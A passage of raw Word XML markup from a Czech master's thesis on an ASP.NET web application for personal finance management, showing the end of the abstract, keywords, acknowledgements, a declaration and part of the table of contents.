      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>which</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>used</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>Results</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> these </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>tests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>described</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>work</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>along</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>further</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>extension</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>concepts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009734E6" w:rsidRDefault="009734E6" w:rsidP="00A831CA">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A1BBD" w:rsidRDefault="00C94493" w:rsidP="00A831CA">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keywords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00CE6577">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A831CA" w:rsidRDefault="00A831CA" w:rsidP="00A831CA">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Personal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> finance, web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>applications</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, ASP.NET, user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>experience</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000758CE">
        <w:t>usability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000758CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000758CE">
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007A1C73" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Děkuji</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> vedoucímu </w:t>
      </w:r>
      <w:r w:rsidR="003D7502">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>mé</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>diplomové</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> práce Ing. </w:t>
      </w:r>
      <w:r w:rsidR="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Radku</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Š</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ilhavému</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Ph.D</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">. za jeho odborné vedení a cennou zpětnou vazbu, kterou mi </w:t>
      </w:r>
      <w:r w:rsidR="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>dával</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> po celou dobu </w:t>
      </w:r>
      <w:r w:rsidR="009705FB">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>tvorby</w:t>
      </w:r>
      <w:r w:rsidR="003D7502">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> této</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> práce. </w:t>
      </w:r>
      <w:r w:rsidR="00A001FE">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Dále bych</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> chtěl poděkovat své přítelkyni a</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> rodině za </w:t>
      </w:r>
      <w:r w:rsidR="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">jejich </w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">podporu a </w:t>
      </w:r>
      <w:r w:rsidR="003415D0">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>vytvořené</w:t>
      </w:r>
      <w:r w:rsidR="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC0422" w:rsidRPr="00BC0422">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">zázemí. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF7567" w:rsidRDefault="00A001FE" w:rsidP="00A001FE">
      <w:r w:rsidRPr="00294C06">
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
          <w:emboss w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Prohlašuji, že odevzdaná verze diplomové práce a verze elektronická nahraná do IS/STAG jsou totožné.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00842711" w:rsidRPr="00842711" w:rsidRDefault="00C94493" w:rsidP="00842711">
      <w:pPr>
        <w:pStyle w:val="Nadpis-Obsah"/>
        <w:pageBreakBefore/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc37577729"/>
      <w:bookmarkStart w:id="2" w:name="_Toc88120440"/>
      <w:bookmarkStart w:id="3" w:name="_Toc88120677"/>
      <w:bookmarkStart w:id="4" w:name="_Toc88120889"/>
      <w:bookmarkStart w:id="5" w:name="_Toc88120993"/>
      <w:bookmarkStart w:id="6" w:name="_Toc88121036"/>
      <w:bookmarkStart w:id="7" w:name="_Toc88121173"/>
      <w:bookmarkStart w:id="8" w:name="_Toc88121547"/>
      <w:bookmarkStart w:id="9" w:name="_Toc88121604"/>
      <w:bookmarkStart w:id="10" w:name="_Toc88121742"/>
      <w:bookmarkStart w:id="11" w:name="_Toc88122008"/>
      <w:bookmarkStart w:id="12" w:name="_Toc88124611"/>
      <w:bookmarkStart w:id="13" w:name="_Toc88124648"/>
      <w:bookmarkStart w:id="14" w:name="_Toc88124798"/>
      <w:bookmarkStart w:id="15" w:name="_Toc88125781"/>
      <w:bookmarkStart w:id="16" w:name="_Toc88126301"/>
      <w:bookmarkStart w:id="17" w:name="_Toc88126452"/>
      <w:bookmarkStart w:id="18" w:name="_Toc88126519"/>
      <w:bookmarkStart w:id="19" w:name="_Toc88126548"/>
      <w:bookmarkStart w:id="20" w:name="_Toc88126764"/>
      <w:bookmarkStart w:id="21" w:name="_Toc88126854"/>
      <w:bookmarkStart w:id="22" w:name="_Toc88127095"/>
      <w:bookmarkStart w:id="23" w:name="_Toc88127138"/>
      <w:bookmarkStart w:id="24" w:name="_Toc88128503"/>
      <w:bookmarkStart w:id="25" w:name="_Toc107634140"/>
      <w:bookmarkStart w:id="26" w:name="_Toc107635157"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OBSAH</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rsidR="00956893" w:rsidRDefault="004D2639">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3;4;Nadpis;2;Část;1" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc387327786" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Úvod</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327786 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="004D2639">
      <w:pPr>
        <w:pStyle w:val="Obsah1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc387327787" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>TEORETICKÁ ČÁST</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327787 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</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788" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:caps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Požadavky na aplikaci pro správu financí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327788 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</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789" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:caps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Typy aplikací pro správu financí</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327789 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</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790" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>2.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Desktopové aplikace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327790 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</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791" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>2.2</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Mobilní aplikace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327791 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</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792" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>2.3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Webové aplikace</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327792 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</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793" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:caps w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Přehled dostupných řešení</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327793 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</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794" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>3.1</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
